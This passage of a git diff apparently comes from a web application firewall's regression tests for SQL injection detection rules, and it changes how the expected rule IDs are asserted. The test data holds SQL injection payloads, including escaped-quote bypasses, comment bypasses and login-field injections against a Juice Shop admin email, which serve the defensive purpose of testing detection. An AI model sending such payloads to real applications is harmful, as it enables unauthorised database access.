uery%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 17 desc: "Performance test" stages: @@ -275,7 +291,8 @@ tests: data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 18 desc: "Performance test" stages: @@ -291,7 +308,8 @@ tests: data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 19 desc: "Negative test: performance test" stages: @@ -307,7 +325,8 @@ tests: data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 20 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: @@ -323,7 +342,8 @@ tests: data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 21 desc: "Detects odd number of quotes in request headers" stages: @@ -338,7 +358,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: @@ -353,7 +374,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 23 desc: "Detects odd number of quotes in request headers" stages: @@ -368,7 +390,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 24 desc: "Detects odd number of quotes in request headers" stages: @@ -383,4 +406,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml index 31a358005..f81b8e311 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml @@ -20,7 +20,8 @@ tests: data: "var=%5C'or'1" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: @@ -37,7 +38,8 @@ tests: data: "var=%5C%22or%221" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 3 desc: "Blocks bypass with escaped quotes" stages: @@ -54,7 +56,8 @@ tests: data: "var=%5C%60or%601" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 4 desc: "Blocks bypass with: \\'and" stages: @@ -70,7 +73,8 @@ tests: data: "var=%5C'and" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 5 desc: "Negative test: doesn't block normal SQLi" stages: @@ -86,7 +90,8 @@ tests: data: "var='or'1" version: HTTP/1.0 output: - no_log_contains: id "942522" + log: + no_expect_ids: [942522] - test_id: 6 desc: "Negative test: doesn't block escaped quotes without following (and|or)" stages: @@ -102,7 +107,8 @@ tests: data: "var=%5C' foo or" version: HTTP/1.0 output: - no_log_contains: id "942522" + log: + no_expect_ids: [942522] - test_id: 7 desc: "New line bypass" stages: @@ -118,7 +124,8 @@ tests: data: "var=newline%0A%5C' and 1" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 8 desc: "Negative test: Wikipedia article about SQLi" stages: @@ -134,7 +141,8 @@ tests: data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" version: HTTP/1.0 output: - no_log_contains: id "942522" + log: + no_expect_ids: [942522] - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: @@ -150,4 +158,5 @@ tests: data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml index 728516d9a..0fc688711 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -19,4 +19,5 @@ tests: data: "email=admin@juice-sh.op';&password=foo" version: HTTP/1.0 output: - log_contains: id "942530" + log: + expect_ids: [942530] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml index 0fce21551..ad78ed7d5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml @@ -19,7 +19,8 @@ tests: data: "email=admin%40juice-sh.op';" version: HTTP/1.0 output: - log_contains: id "942540" + log: + expect_ids: [942540] - test_id: 2 desc: "Positive test for double quotes" stages: @@ -35,7 +36,8 @@ tests: data: "email=admin%40juice-sh.op\";" version: HTTP/1.0 output: - log_contains: id "942540" + log: + expect_ids: [942540] - test_id: 3 desc: "Positive test for backticks" stages: @@ -51,7 +53,8 @@ tests: data: "email=admin%40juice-sh.op`;" version: HTTP/1.0 output: - log_contains: id "942540" + log: + expect_ids: [942540] - test_id: 4 desc: "False positive test CSV balanced single quotes" stages: @@ -67,7 +70,8 @@ tests: data: "email='foo';'bar';'def'" version: HTTP/1.0 output: - no_log_contains: id "942540" + log: + no_expect_ids: [942540] - test_id: 5 desc: "False positive test balanced backticks" stages: @@ -83,7 +87,8 @@ tests: data: "email=`foo`;`bar`;`def`" version: HTTP/1.0 output: - no_log_contains: id "942540" + log: + no_expect_ids: [942540] - test_id: 6 desc: "False positive test (markdown) mixed and balanced quotes" stages: @@ -109,7 +114,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - no_log_contains: id "942540" + log: + no_expect_ids: [942540] - test_id: 7 desc: "Test for bypass with comment" stages: @@ -125,4 +131,5 @@ tests: data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" version: HTTP/1.0 output: - log_contains: id "942540" + log: + expect_ids: [942540] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml 